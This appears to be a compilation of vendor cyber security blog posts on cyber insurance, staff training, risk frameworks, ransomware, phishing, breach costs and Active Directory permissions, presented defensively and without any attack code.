Cyber threats are so numerous that it’s impossible to prevent security incidents altogether.
That’s why they organisations increasingly relying on cyber insurance policies to cover the costs when data breaches and cyber attacks occur.
But just how helpful is cyber insurance? We take at a look at everything you need to know in this blog.
What is cyber insurance?
Cyber insurance is a specific type of protection, helping organisations mitigate the financial costs associated with information security incidents.
These costs typically won’t be included in standard business insurance policies, which tend to cover only the damage or loss of equipment itself, rather than harm caused by a cyber security event.
How does cyber insurance work?
When a covered organisation suffers a security incident and submits a claim, the insurer will investigate and then pay out accordingly.
Security incidents cause many issues that can’t be fixed with financial reimbursement, such as the time and effort it takes to recover or the reputational damage you could face.
Likewise, the cost of a data breach is related to the speed at which organisations can detect and respond to an incident. Indeed, Ponemon Institute’s Cost of a Data Breach Report 2020 found that organisations that can address a breach within 200 days save about £750,000 compared to those that take longer to respond.
If organisations have to wait for their insurer to review the incident, the costs will escalate and their premium will increase.
You must therefore view cyber insurance as a complement to your cyber security defences and an extra resource to mitigate costs rather than an alternative.
What does a cyber insurance policy cover?
Cyber insurance covers the financial costs of incidents that affect the confidentiality, integrity and availability of information. This includes cyber attacks and data breaches, as well as other events that impact IT systems and networks.
Policies generally provide organisations with the means to manage the incident. This includes forensic investigation, incident response, legal assistance and public relations support.
What is not covered by cyber insurance?
Cyber insurance policies generally don’t cover damages that were caused or exacerbated by the organisation itself.
This might include business email compromise fraud or acts of gross negligence.
Likewise, some insurers won’t reimburse organisations that pay up after a ransomware attack, given that experts advise organisations not to pay because payment helps fuel the cyber crime industry and could make the organisation a soft target for future attacks.
Who needs cyber insurance?
Any organisation that relies on information technology or processes sensitive data is vulnerable to cyber attacks and data breaches, and should therefore consider cyber insurance.
You can find out whether cyber insurance is the right strategy by following ISO 27001’s risk assessment methodology, which helps organisations decide the most appropriate way to address cyber security issues.
Modify the risk by applying security controls that will reduce the likelihood of it occurring and/or damage it will cause.
Retain the risk by accepting that it falls within previously established risk acceptance criteria, or via extraordinary decisions.
Avoid the risk by changing the circumstances that are causing it.
Share the risk with a partner, such as a cyber insurance firm or a third party that is better equipped to manage the risk.
How much does cyber insurance cost?
An AdvisorSmith study found that the average cost of cyber insurance was $1,500 (about £1,160) per year for $1 million (£770,000) in coverage.
However, the costs will vary greatly depending on the organisation’s size, industry, the amount of sensitive data it processes and the strength of its existing cyber security measures.
Some insurers may also offer different levels of protection. For example, you could pay less each month but be covered against a smaller set of damages – or vice versa.
Is my existing cyber security enough?
Organisations are free to decide whether they should purchase cyber insurance.
In most cases, there is no legal or contractual requirement to have cyber insurance, so the organisation might decide that its budget is better spent on cyber defences and business continuity management.
However, there may well be times where it makes financial sense to invest in cyber insurance, for example when the costs of a breach far exceed the amount you would be paying in coverage.
With this annual subscription service, our experts are on hand to advise you on the best way to protect your organisation.
They’ll guide you through a variety of security practices – including vulnerability scans, staff training and the creation of policies and procedures – ensuring that you have the foundations of an effective security strategy.
These measures will help you stay one step ahead of cyber criminals, preventing a wide array of threats and putting you in a position to claim competitive cyber insurance rates.
Organisations are always looking for ways to improve their security practices, and one of the most effective ways to achieve this is by enrolling employees on cyber security training courses.
A recent Lucy Security study found that 96% of respondents agreed that a greater level of awareness over cyber security threats contributed to overall improvements in their defences.
Despite that, comparatively few provided adequate training to help staff mitigate the risks of data breaches and cyber attacks.
For example, only 81% of respondents said they conduct phishing simulations, and only 51% say their organisation has a mechanism to report suspicious emails.
With October being European Cyber Security Awareness Month, there has never been a better time is there to boost your organisation’s knowledge of effective information security practices.
Here are three reasons to consider it.
1. You’ll reduce the risk of data breaches
Almost all data breaches are caused by a mistake somewhere in the organisation. So if you want to keep your organisation secure, your employees to know what they’re doing.
That doesn’t only mean negligence – it could also be mistakes that you don’t even know are mistakes, such as gaps in your policies, ineffective processes or a lack of proper technological defences.
Placing staff on information security training courses will help them understand the mistakes they’re making and teach them to work more effectively.
This is especially useful if you intend to commit to a framework such as ISO 27001, the international standard for information security, as there are specific courses that teach you how to follow the Standard’s requirements.
2. You’ll meet compliance requirements
Cyber security laws and regulations inevitably contain complex requirements, so organisations need employees with specialist knowledge to achieve compliance.
Finding qualified personnel isn’t the only problem. A small pool of skilled workers also means job candidates can command a higher salary and more benefits.
As such, organisations might not be able to afford qualified professionals even if they can find them.
They should therefore do whatever they can to support employees who want to go on training courses. Organisations will almost certainly benefit from the extra knowledge, and it eases the pressure of finding skilled personnel in the job market.
Which course is right for you?
Cyber security is a broad industry, so you need to decide which area suits you best. To help you make that choice, here are some of our most popular training courses:
The GDPR is the most significant update to information security law in more than twenty years. Anyone who handles personal data or is responsible for data protection needs to comply with its requirements.
understanding—require a lot of additional explanation. For example, what is a vulnerability assessment? If five cyber professionals are sitting around a table discussing this question, you will end up with seven or eight answers. One will say that a vulnerability assessment is vulnerability scanning only. Another will say an assessment is much bigger than scanning and addresses ethical hacking and internal security testing. Another will say that it is a passive review of policies and controls. All are correct in some form, but the answer really depends on the requirements or criteria you are trying to achieve. And it also depends on the skills and experience of the risk owner, auditor, or assessor. Is your head spinning yet? I know mine is! Hence the “three parts art.”
There is quite a bit of subjectivity in the cyber security business. One auditor will look at evidence and agree you are in compliance; another will say you are not. If you are going to protect sensitive information, do you encrypt it, obfuscate it, or segment it off and place it behind very tight identification and access controls before allowing users to access the data? Yes. As we advise our client base, it is essential that we have all the context necessary to make good risk-based decisions and recommendations.
Let’s talk about Connection’s artistic methodology. We start with a canvas that addresses the core components of cyber security: protection, detection, and reaction. By addressing each of these three pillars in a comprehensive way, we ensure that the full conversation around how people, process, and technology all work together to provide a comprehensive risk strategy is achieved.
People Users understand threat and risk and know what role they play in the protection strategy. For example, if you see something, say something. Don’t let someone surf in behind you through a badge check entry. And don’t think about trying to shut off your end-point anti-virus or firewall. In today’s remote workforce environment, good employee security awareness, especially related to phishing is essential.
Process Policy are established, documented, and socialized. For example, personal laptops should never be connected to the corporate network. Also, don’t send sensitive information to your personal email account so you can work from home.
Technology Some examples of the barriers used to deter attackers and breaches are edge security with firewalls, intrusion detection and prevention, sandboxing, and advanced threat detection. Security leaders need to become a student of threat, and deploy the correct technology to protect, detect, and react to threat.
The average mean time to identify an active incident in a network is 197 days. The mean time to contain an incident is 69 days.
People Incident response teams need to be identified and trained, and all employees need to be trained on the concept of “if you see something, say something.” Detection is a proactive process.
Process What happens when an alert occurs? Who sees it? What is the documented process for taking action?
Technology What is in place to ensure you are detecting malicious activity? Is it configured to ignore noise and only alert you of a real event? Will it help you bring that 197-day mean time to detection way down?
People What happens when an event occurs? Who responds? How do you recover? Does everyone understand their role? Do you War Game to ensure you are prepared WHEN an incident occurs?
Process What is the documented process to reduce the Kill Chain—the mean time to detect and contain—from 69 days to 69 minutes? Do you have a Business Continuity and Disaster Recovery Plan to ensure the ability to react to a natural disaster, significant cyber breach such as ransomware, DDoS, or—dare I say it—a pandemic?
Technology What cyber security consoles have been deployed that allow quick access to patch a system, changing firewall rules, adjusting ACLs, or policy setting at an end point, or track a security incident through the triage process?
All of these things are important to create a comprehensive InfoSec Program. The science is the technology that will help you build a layered, in-depth defense approach. The art is how to assess the threat, define and document the risk, and create a strategy that allows you to manage your cyber risk as it applies to your environment, users, systems, applications, data, customers, supply chain, third party support partners, and business process.
More Art – Are You a Risk Avoider or Risk Transference Expert?
A better way to state that is, “Do you avoid all risk responsibility, or do you give your risk responsibility to someone else?” Hint: I don’t believe in risk avoidance or risk transference.
Yes, there is an art to risk management. There is also science if you use, for example, The Carnegie Mellon risk tools. But a good risk owner and manager documents risk, prioritizes it by risk criticality, turns it into a risk register or roadmap plan, remediates what is necessary, and accepts what is reasonable from a business and cyber security perspective. Oh, by the way, those same five cyber security professional we talked about earlier, they have 17 definitions of risk.
As we wrap up this conversation, let’s talk about the importance of selecting a risk framework. It’s kind of like going to a baseball game and recognizing the program helps you know the players and the stats. What framework will you pick? Do you paint in watercolors or oils? Are you a National Institute of Standards (NIST) artist, an Internal Standards Organization artist, or have you developed your own framework like the Nardone puzzle chart? I developed this several years ago when I was the CTO/CSO of the Commonwealth of Massachusetts. It has been artistically enhanced over the years to incorporate more security components, but it is loosely coupled on the NIST 800-53 and ISO 27001 standards.
When it comes to selecting a security framework as a CISO, I lean towards the NIST Cyber Security Framework (CSF) pictured below. This framework is comprehensive and provides a scoring model that allows risk owners to measure and target what risk level they believe they need to achieve based on their business model, threat profile, and risk tolerance. It has five functional focus areas. The ISO 27001 framework is also a very solid and frequently used model. Both of these frameworks can result in a Certificate of Attestation demonstrating adherence to the standard. Many commercial corporations do an annual ISO 27001 assessment for that very reason. More and more are leaning towards the NIST CSF, especially commercial corporations doing work with the government. Keep in mind that frameworks mature, and compliance requirements change. For example, if you are a commercial corporation doing business with the federal government, you will need to comply with the new Cyber Security Model Certification (CMMC) soon to continue doing business with the government.
As I reflect upon my 40 years as a cyber security professional, I think of the many instances where the basic tenets of cyber security—those we think have common understanding—require a lot of additional explanation. For example, what is a vulnerability assessment? If five cyber professionals are sitting around a table discussing this question, you will end up with seven or eight answers. One will say that a vulnerability assessment is vulnerability scanning only. Another will say an assessment is much bigger than scanning and addresses ethical hacking and internal security testing. Another will say that it is a passive review of policies and controls. All are correct in some form, but the answer really depends on the requirements or criteria you are trying to achieve. And it also depends on the skills and experience of the risk owner, auditor, or assessor. Is your head spinning yet? I know mine is! Hence the “three parts art.”
Dealing with the aftermath of ransomware attacks is like Russian roulette. Submitting the ransom might seem like it’s the sole option for recovering locked data. But paying the ransom doesn’t mean that your organization will get its affected data back. Let’s not forget that ransomware also continues to evolve as a threat category. Beginning in […]… Read More
We’ve run through some of the essential steps in this blog, or download the full, free checklist from our website.
Firewalls are one of many types of software that organisations should implement to protect their systems.
They are designed to create a buffer between your IT systems and external networks, by monitoring network traffic and block anything that could damage your computers, systems and networks.
This will help prevent cyber criminals from breaking into your networks and block outgoing traffic that originates from a virus.
Install antivirus software
Antivirus software is another essential technological defence – and contrary to what the name implies, it isn’t just designed to root out viruses.
Modern antivirus generally includes protection against a range of threats, including malware, ransomware, keyloggers, Trojan horses, worms, adware and spyware.
The software works by scanning your computer or network, looking for riles that match its built-in database of known malicious programs. The more advanced the software is, the larger that database will be and the more likely it is that it will detect a problem.
When software providers fix a vulnerability on their applications, its users are required to download the update (or ‘patch’).
Organisations tend to use many software providers, each of which releases regular patches – Microsoft, for examples, fixes vulnerabilities so often that the term ‘Patch Tuesday’ was coined.
As such, it makes sense to create a patch management plan to help you keep track of updates you’ve applied and to make sure each one has been installed successfully.
Conduct a cyber security risk assessment
A cyber security risk assessment helps organisations evaluate their weaknesses and gain insights into the best way to address them.
ISO 27001, the international standard that sets out the specification for an ISMS (information security management system), is built around risk assessments and contains step-by-step guidance on how to complete the process.
You don’t need to certify to ISO 27001 to follow its advice – or even follow the rest of the Standard’s guidance – although doing so clearly has many benefits.
Create an information security policy
Information security policies are the result of a risk assessment. They describe the vulnerabilities that have been identified and the measures that the organisation has adopted to prevent them.
The document should contain a thorough outline of each risk, the relevant control(s) and the organisation’s continual improvement strategy, including when and how they will review the effectiveness of the control.
Encrypt sensitive data
In an information security context, encryption is a way of ‘scrambling’ sensitive data, ensuring that it can only be accessed by authorised personnel with a decryption key.
By encrypting data, you guarantee that even if criminal hackers break into your systems, they are unable to view your files. This helps mitigate the risk of data breaches and could prevent a GDPR (General Data Protection Regulation) violation.
Create a remote working policy
The COVID-19 pandemic has reshaped the way organisations work, with the majority planning to permanently switch to remote working – whether that’s on a full-time basis or giving employees the opportunity to come into the office a few days a week.
As you will no doubt know, remote working comes with unique information security challenges, which you’ll need to address in a dedicated policy.
This will include guidance on storing devices securely, creating and maintaining strong passwords, and an acceptable use policy for visiting websites that aren’t work-related.
Organisations should also explain the technical solutions that they’ve implemented to protect sensitive data and how employees can comply with them. For example, we recommend applying two-factor authentication to any third-party service that you use.
Conduct vulnerability scans
Many cyber attacks are automated, with criminals searching for and exploiting known vulnerabilities.
Organisations can prevent these attacks by conducting their own scans to identify weaknesses before crooks exploit them.
But that’s not the only benefit of vulnerability scanning. The process will also help you determine the overall effectiveness of your security measures, save you time and money in the long run.
Conduct penetration tests
Penetration tests are a controlled form of hacking in which a cyber security professional, working on behalf of an organisation, attempts to find exploits in the same way that a criminal would.
These tests are more rigorous than automated scans, as they enable the actor to leverage weaknesses and gain a true insight into the way a criminal might access your sensitive information.
Penetration testers may, for example, exploit system misconfigurations or send staff phishing emails to gather login credentials.
With the vulnerabilities the ethical hacker discovers, organisations can implement defences to stop criminals before they’ve had a chance to target the organisation.
Create a business continuity plan
A business continuity plan outlines the steps an organisation must take to ensure its critical processes continue operating in the event of a major disruption.
This information is put into a document, which is regularly tested, developed and improved upon to make sure the organisation has recovery strategies in place for a range of threats.
Download our free checklist
You can learn more about the steps you should take to prevent and respond to cyber security incidents by downloading our Cyber Security Risk Scorecard.
This free document contains twenty questions you should ask yourself to determine whether you have the necessary defences in place.
It’s designed to give a broad indication of your organisation’s overall readiness, helping you understand what your next steps should be and how urgently you need to address cyber security.
A patient at Dusseldorf University Hospital died during a ransomware infection in what is reportedly the first death directly linked to a cyber attack.
The hospital was unable to accept emergency patients because of the attack, so the woman – who needed urgent treatment for a life-threatening illness – was sent to another hospital 20 miles away, the Associated Press reported.
The ransom note was addressed to a nearby university, which suggests that the attackers weren’t aware that they had infected one of the largest hospitals in western Germany.
The criminals stopped their attack when they learned that it had shut down the hospital, but by then the damage had been done.
Although it might be easy to chalk this up as unfortunate, you could just as easily say that it was only a matter of time until something like this happened.
Arne Schönbohm, president of the Federal Office for Information Security, confirmed that the attack exploited a vulnerability in a Citrix VPN system, which the hospital had been aware of since December 2019.
“I can only urge you not to ignore or postpone such warnings but to take appropriate action immediately,” said Schönbohm. “This incident shows once again how seriously this danger must be taken.”
Same old story
The healthcare sector has been a lucrative target for cyber criminals for years, due to its apparent unwillingness to commit to better defences and, in particular, its widespread use of legacy systems.
The UK saw the damage that can occur when relying on legacy systems with the WannaCry attack in 2017.
Most NHS facilities were still using Windows XP, which Microsoft had stopped supporting in 2014 – and it was a vulnerability with that system that exposed 80 NHS trusts and led to £92 million in damages.
Given the spate of attacks on hospitals during the coronavirus pandemic – both in the UK and the rest of the world – you would have thought it was only a matter of time before we were no longer talking about just the financial and logistical issues caused by cyber attacks, but the human cost.
Hopefully this incident will be a wake-up call for hospitals, which desperately need to prioritise security strategies and realise that cyber attacks can be just as damaging as physical assaults.
If you’re an SME, cyber security might seem impossibly complex and filled with endless pitfalls.
Although it’s true that there’s a lot at stake – with ineffective security measures potentially threatening your productivity, your bank accounts, and your employees’ and third parties’ personal data – the path to effective security needn’t be difficult.
In this blog, we explain everything that small business owners need to know about protecting their organisations and reducing the risk of security breaches.
Why cyber security presents unique risks for SMEs
The difficulties that small businesses face when addressing cyber risks can be separated into financial costs and their ability to gain expert advice.
When we talk about ‘cost’, there are several issues at play. First, there is the fact that many small and medium-sized enterprises lack the budget to invest in comprehensive defences.
Second, there are the costs that organisations occur as a result of a security incident. We’ll talk about the specific financial effects of this in more detail below, but it’s worth noting that the first issue clearly affects the other.
SMEs that are reluctant to invest in in cyber security practices are not only more likely to fall victim but will experience exponentially larger costs as a result – and in many cases, the damage will be insurmountable.
You cannot cut corners when it comes to cyber threats. However tight your budget, you must find a way to address cyber security.
Those with the necessary skills can therefore command a much larger salary, meaning small organisations are being priced out of the market.
SMEs’ best course of action is to look internally – offering existing employees the opportunity to move into a career in cyber security.
Those in an IT background are particularly suited to this career switch, because – although technology only encompasses one aspect of information security – there is a large overlap.
Why SMEs can’t ignore cyber security
Let’s now take a closer look at the repercussions that small organisations face if they don’t properly address cyber security.
The first problem that you’ll run into is business disruption. An attack on your systems may paralyse your network or force you to close off parts of your business to make sure cyber criminals can no longer access your data.
In the time it takes you to investigate the cause of the breach and to get your systems back online, you will be unable to perform certain operations and are likely to experience a loss of production.
Remedial costs and regulatory fines
Getting up and running again is only your first obstacle. If the incident was serious enough, you will need to contact affected customers as well as your data protection supervisory authority, which in the UK is the ICO (Information Commissioner’s Office).
Notifying customers alone can be an expensive and time-consuming endeavour.
You may have to set up helpdesks so that those affected can get in contact to learn more, or even offer them complementary credit checks to reassure them that the breach has no personal financial implications for them.
In addition to this, the ICO may well decide that the incident was a result of a GDPR (General Data Protection Regulation) violation, in which case you are liable to receive a financial penalty and face legal action.
Finally, the incident might result in long-term reputational damage. It can be hard for organisations to retain customers’ trust – and that’s particularly true for small organisations – so you may experience significant customer churn.
Their biggest vulnerability is human error. Small organisations are far less likely than larger ones to have systematic staff awareness training programmes in place, meaning there is an increased possibility of someone making an avoidable mistake.
On a similar note, employees at small organisations are more likely to act maliciously – purposely using information in a way that’s detrimental to the organisation.
One reason for this is that smaller organisations are less likely to have monitoring tools to catch them in the act. For example, they might not have access controls installed, which would limit the amount of information that an employee could view.
Without it, any member of staff who wanted to steal sensitive information (perhaps with the intention of selling it on the dark web) could do so, and the organisation would be unable to tell who was responsible.
Another threat that small organisations in particular are vulnerable to is ransomware. This is a type of malware in which criminal hackers lock users out of their systems and demand money for a decryption code.
The most effective way to mitigate the risk of ransomware is to regularly back up your files to an external server. That way, should your systems become infected, you will be able to disconnect them, wipe the data and restore your information using the backups.
This process will take some time – anywhere from a couple of days to a couple of weeks, depending on the size of your operations – but it will be much less expensive and disruptive, and is a far more prudent approach than paying a criminal and hoping that they keep their word.
Unfortunately, many SMEs don’t invest in comprehensive backup strategies, making them an ideal target for crooks.
What can you do to protect your small business from cyber threats?
Most small organisations know that they should be doing more to protect themselves, but it can be difficult knowing where to begin. That’s where our Cyber Security as a Service can help.
With this annual subscription service, our experts are on hand to advise you on the best way to protect your organisation.
They’ll guide you through vulnerability scans, staff training and the creation of policies and procedures, which form the backbone of an effective security strategy.
Cambridgeshire’s susceptibility to cyber attacks is particularly disheartening for us to hear at IT Governance, given that we’re based in the region.
We’ve helped local businesses with more than 1,000 projects, but there’s still clearly a long way to go when it comes to data protection.
One of the essential steps to cyber security is to educate your employees on the risks they face and the ways they can mitigate the risk.
Our Complete Staff Awareness E-learning Suite contains everything you need to stay secure, from organisations’ legal requirements to specific issues that employees face, such as phishing emails and social media scams.
The coronavirus pandemic has arguably affected the education sector more than any other, with schools, colleges and universities around the globe having been forced to close their doors and deliver classes remotely.
Most of the discussion surrounding this has focused on the logistical problems of setting up e-learning platforms, parents balancing their workloads with home-schooling and students completing exams.
However, one of the most significant issues – particularly in the long term – is that the pandemic has also exposed massive cyber security failings in the education sector.
Although some of these attacks are a direct response to schools’ ad hoc response to the pandemic, it’s not as though the education sector was especially resilient before being forced into online learning.
This is the result of schools increasingly relying on technology – whether it’s online learning platforms, teaching tools or day-to-day operations – while neglecting the security concerns that come with it.
Kaspersky notes that several bogus sites replicating Google Classroom and Zoom began popping up at the start of the pandemic.
According to Check Point Research, from the end of April to mid-June, 2,449 domains related to Zoom were registered, 32 of which were malicious and 320 were suspicious.
Fraudsters have also taken aim at Microsoft Teams and Google Meet, as well as universities’ online portals.
DDoS (distributed denial-of-service) attacks
Between February and June 2020, there was a 350–500% increase in DDoS attacks on the education sector compared to the same timeframe last year.
These attacks, which flood network traffic with requests until they are overwhelmed and crash, are usually performed to disrupt an organisation – perhaps as an act of revenge, a political statement or simply for fun – or to distract organisations while the attackers perform a more sophisticated attack.
Adware and malware
The most common threat that the education sector faces are downloaders, adware and Trojan horses.
This threat is almost exclusively related to the widespread implementation of Zoom. The video conferencing app saw a surge in popularity at the start of lockdown, and cyber criminals responded by creating bogus application installers.
Students and teachers have repeatedly been fooled into installing a bogus version of Zoom, unleashing malicious software onto their systems.
Kaspersky reports that, of the 168,55 instances of bogus application installations that it detected between January and June, 99.5% were associated with fake Zoom apps.
How should schools respond?
Despite schools and universities worldwide reopening their doors to students, digital learning continues to be an essential part of the way they operate – and these systems must be more resilient to attacks.
But although many organisations in the education sector know that they should be doing more, they might not know where to begin. That’s where our Cyber Security as a Service can help.
With this annual subscription service, our experts are on hand to advise you on the best way to protect your organisation.
They’ll guide you through vulnerability scans, staff training and the creation of policies and procedures, which form the backbone of an effective security strategy.
Even if most of us think we would be able to spot a phishing scam when we receive one, it only takes a momentary lapse in judgement for us to fall victim.
The panic one experience when they receive a message claiming that, for example, there has been suspicious activity on the recipient’s account will in many cases cause people to overlook signs that the message is malicious.
But by that point it’s too late, with the victim already clicking links, opening attachments and handing over their username and password.
The good news is this is a weakness that organisations and individuals have the power to address. All they have to do learn about the way phishing works and the clues to look out for.
The result? IT departments are not at all confident in their users’ ability to recognise incoming threats, or in their organisation’s ability to stop phishing campaigns and related attacks.
2. Organisations aren’t doing enough
Staff awareness training isn’t the only step that organisations can take to better protect themselves from phishing scams.
The report highlights three key areas of weakness:
Insufficient backup processes
In the event of a ransomware attack, most organisations have insufficient backup processes. This leaves them unable to quickly restore content on servers, user workstations and other endpoints to a healthy state.
Lack of user testing
Most organisations do not have adequate procedures in place to test their users, leaving them unable to determine which staff members are the most susceptible to an attack.
Conducting a simulated phishing attack can help you establish whether your employees are vulnerable to phishing emails, enabling you to take immediate remedial action to improve your cyber security posture.
BYOD security risks
Many organisations lack a BYOD (Bring Your Own Device) policy, meaning that, should a cyber criminal compromise an employee’s device, they will be able to gain access to sensitive data not only on that device but to leverage their access across the network.
3. Criminal organisations are well funded
The massive success that cyber criminals have had in recent years means they have plenty of funds to invest in scams.
As such, they can invest in technical resources to root out make their scams run more efficiently – whether that’s in the number of scams they can send, the authenticity of their bogus messages or the complexity of their campaigns.
It’s also enabled cyber criminals to branch out into new attack vectors. For example, there has been a significant increase in social media in recent years.
In response, cyber criminals have changed tactics, looking to make money through organisations directly thanks to ransomware attacks.
These types of attack are no more complicated for a cyber criminal to pull off, but the rewards can be much greater.
Although experts warn organisations not to pay ransoms, it’s certainly tempting to wire transfer a lump sum in the hopes that you’ll get your systems back online rather than face the headaches that come with incident response.
5. Phishing tools are low-cost and widespread
There are an increasing number of tools that are designed to help amateurs with little IT knowledge get into the cyber crime industry.
The availability of phishing kits and the rise of ransomware-as-a-service has resulted in an explosion of ransomware and other exploits coming from an ever growing network of amateur cyber criminals.
6. Malware is becoming more sophisticated
Over time, phishing and various types of malware have become more sophisticated.
The problems of phishing, spear-phishing, CEO fraud, business email compromise and ransomware are simply going to get worse without appropriate solutions and processes to defend against them.
Protect your organisation against phishing
Educated and informed employees are your first line of defence. Empower them to make better security decisions with our complete staff awareness e-learning suite.
A cost-effective way of managing all your staff awareness training in one place, the complete suite contains eight e-learning courses to help you transform your employees from threats to assets.
A version of this blog was originally published on 27 March 2017.
That represents a slight decrease on 2019, which Ponemon’s researchers credit to organisations doing a better job strengthening their cyber defences and incident response capabilities.
The report also notes that 52% of data breaches are caused by cyber attacks, and that malware is the costliest form of attack, with organisations spending $4.52 million (about £3.4 million) on average responding to such incidents.
What activities cost organisations money following a data breach?
The report outlines four activities that cost organisations money as they respond to data breaches:
Detection and escalation
These are activities that enable organisations to identify when a breach has occurred.
It covers processes such as forensic and investigative activities, assessment and audit services, crisis management and communications to executives and boards.
These are activities that attempt to minimise the loss of customers, business disruption and revenue losses.
It can include disruption caused by system downtime, the costs associated with customer churn and reputational loss.
These are activities related to the way organisations notify data subjects, regulators and third parties of the data breach.
For example, organisations will typically email or telephone those affected, assess whether the incident needs to be reported to their regulator (and contact them where relevant) and consult with outside experts.
These are the costs associated with recompensing affected data subjects, and the legal ramifications of the incident.
It includes credit monitoring services for victims, legal expenses, product discounts and regulatory fines.
Mitigating the cost of an attack
The report also highlighted the relationship between the cost of a data breach and the time it takes organisations to contain it. The researchers found that organisations take 280 days on average to detect and respond to an incident. However, those that can complete this process within 200 days save about $1 million (about £750,000).
The best way to do that, according to Ponemon Institute, is to implement automated tools to help detect breaches and suspicious behaviour.
Organisations that used artificial intelligence and analytics had the most success mitigating the costs of data breaches, spending $2.45 million (about £1.84 million) on their recovery process.
By contrast, organisations that didn’t implement such measures spent more than twice that, with an average cost of $6.03 million (about £4.5 million).
This is a lesson that organisations are gradually taking on board. The report found that the proportion of organisations that have implemented measures such as artificial intelligence platforms and automated tools has increased from 15% to 21% in the past two years.
Unfortunately, many organisations don’t know where to begin when implementing and testing defences. That’s where our Cyber Security as a Service can help.
With this annual subscription service, our experts are on hand to advise you on the best way to protect your organisation.
They’ll guide you through vulnerability scans, staff training and the creation of policies and procedures, which form the backbone of an effective security strategy.
One truth of parenting is this: we do a lot of learning on the job. And that often goes double when it comes to parenting and the internet.
That’s understandable. Whereas we can often look to our own families and how we were raised for parenting guidance, today’s always-on mobile internet, with tablets and smartphones almost always within arm’s reach, wasn’t part of our experience growing up. This is plenty new for nearly all of us. We’re learning on the job as it were, which is one of the many reasons why we reached out to parents around the globe to find out what their concerns and challenges are—particularly around family safety and security in this new mobile world of ours.
Just as we want to know our children are safe as they walk to school or play with friends, we want them to be just as safe when they’re online. Particularly when we’re not around and there to look over their shoulder. The same goes for the internet. Yet where we likely have good answers for keeping our kids safe around the house and the neighborhood, answers about internet safety are sometimes harder to come by.
Recently, we conducted a survey of 600 families and professionals in the U.S. to better understand what matters to them—in terms of security and the lives they want to lead online. The following article reflects what they shared with us, and allows us to share it with you in turn, with the aim of helping you and your family stay safer and more secure. 1
What concerns and questions do parents have about the internet?
The short answer is that parents are looking for guidance and support. They’re focused on the safety of their children, and they want advice on how to parent when it comes to online privacy, safety, and screen time. Within that, they brought up several specific concerns:
Help my kids not feel anxious about growing up in an online world.
There’s plenty wrapped up in this statement. For one, it refers to the potential anxiety that revolves around social networks and the pressures that can come with using social media—how to act, what’s okay to post and what’s not, friending, following, unfriending, unfollowing, and so on—not to mention the notion of FOMO, or “fear of missing out,” and anxiety that arises from feelings of not being included in someone else’s fun.
Keep my kids safe from bullying, or bullying others.
Feel like I can leave my child alone with a device without encountering inappropriate content.
If we think of the internet as a city, it’s the biggest one there is. For all its libraries, playgrounds, movie theatres, and shopping centers, there are dark alleys and derelict lots as well. Not to mention places that are simply age appropriate for some and not for others. Just as we give our children freer rein to explore their world on their own as they get older, the same holds true for the internet. There are some things we don’t want them to see and do.
Balance the amount of screen time my children get each day.
Screen time is a mix of many things—from schoolwork and videos to games and social media. It has its benefits and its drawbacks, depending on what children are doing and how often they’re doing it. The issue often comes down to what is “too much” screen time, particularly as it relates to the bigger picture of physical activity, face-to-face time with the family, hanging out with friends, and getting a proper bedtime without the dim light of a screen throwing off their sleep rhythms.
Where can parents get started?
Beyond our job of providing online security for devices, our focus at McAfee is on protecting people. Ultimately, that’s the job we aim to do—to help you and your family be safer. Beyond creating software for staying safe, we also put together blogs and resources that help people get sharp on the security topics that matter to them. For parents, check out this page which puts forward some good guidance and advice that can help. Check it out, and we hope that you’ll find even more ways you can keep you and your family safe.
On Monday, the RSA Conference 2020will begin, where almost a thousand cyber security companies will showcase their greatest cyber security solutions to thousands of attendees, and where supposedly "The World Talks Security!"
If that's the case, let's talk security -I'd like to ask the entire RSA Conference just 1 simple cyber security question -
Question: Do the companies whose CISOs and cyber security personnel are attending the RSA Conference '20 have any idea exactly who has what privileged access in their foundational Active Directory deployments today?
If they don't, then perhaps instead of making the time to attend cyber security conferences, they should first focus on making this paramount determination, because without it, not ONE thing, let alone their entire organization, can be adequately secured.
If this one simple question posed above isn't clear, here are 5 simple specific cyber security 101 questions to help gain clarity:
Does our organization know exactly -
Q 1. Who can run Mimikatz DCSync against our Active Directory to instantly compromise everyone's credentials?
Q 2. Who can change the Domain Admins group's membership to instantly gain privileged access company wide?
Q 3. Who can reset passwords of /disable use of Smartcards on all Domain Admin equivalent privileged accounts?
Q 4. Who can link a malicious GPO to an(y) OU in Active Directory to instantly unleash ransomware system-wide?
Q 5. Who can change or control who has what privileged access in our Active Directory?
If an organization does not have exact answers to these 5 simple questions today, it has absolutely no idea as to exactly who has what privileged access in its foundational Active Directory, and thus, it has absolutely no control over cyber security.
This is Paramount
If you don't think that having exact answers to these questions is paramount, then you don't know a thing about cyber security.
Just ask the world famous and globally trusted $10 Billion cyber security company CrowdStrike, and here's a quote from them - "A secure Active Directory environment can mitigate most attacks."
Zero out of 1000
There are almost 1000 cyber security companies exhibiting at the RSA Conference 2020, but guess how many of those 1000 companies could help you accurately determine the answers to 5 simple questions asked above? The answer is 0.
Not Microsoft, not EMC, not CrowdStrike, not FireEye, not Cisco, not IBM, not Symantec, not McAfee, not Palantir, not Tanium, not CyberArk, not Centrify, not Quest, not ZScaler, not BeyondTrust, not Thycotic, not Varonis, not Netwrix, not even HP, in fact no company exhibiting at RSA Conference 2020 has any solution that could help accurately answer these simple questions.
That's right - not a single cyber security company in the world (barring one), let alone the entirety of all cyber security companies exhibiting at or sponsoring the RSA Conference 2020 can help organizations accurately answer these simple questions.
The key to being able to answer the leading question above, as well as the five simple cyber security questions posed above lies in having just 1 simple, fundamental cyber security capability - Active Directory Effective Permissions.
There's only 1 company on planet Earth that possesses this key, and its not going to be at the RSA Conference 2020 - this one.
Today, yet again, I'd like to share with you a simple Trillion $ question, one that I had originally asked more that 10 years ago, and recently asked again just about two years ago. Today it continues to be exponentially more relevant to the whole world.
In fact, it is more relevant today than ever given the paramount role that cyber security plays in business and national security.
So without further adieu, here it is - Who needs WMDs (Weapons of Mass Destruction) Today?
Ans: Only those who don't know that we live in a digital world, one wherein virtually everything runs on (networked) computers.
Why would an entity bother trying to acquire or use a WMD (or for that matter even a conventional weapon) when (if you're smart) you could metaphorically stop the motor of entire organizations (or nations) with just a few lines of code designed to exploit arcane but highly potent misconfigured security settings (ACLs) in the underlying systems on which governments, militaries and thousands of business organizations of the world operate?
Today, all you need is two WDs in the same (pl)ACE and its Game Over.
Puzzled? Allow me to give you a HINT:.
Here’s a simple question: What does the following non-default string represent and why should it be a great cause of concern?
Today, this one little question and the technicality I have shared above directly impacts the cyber security of the entire world.
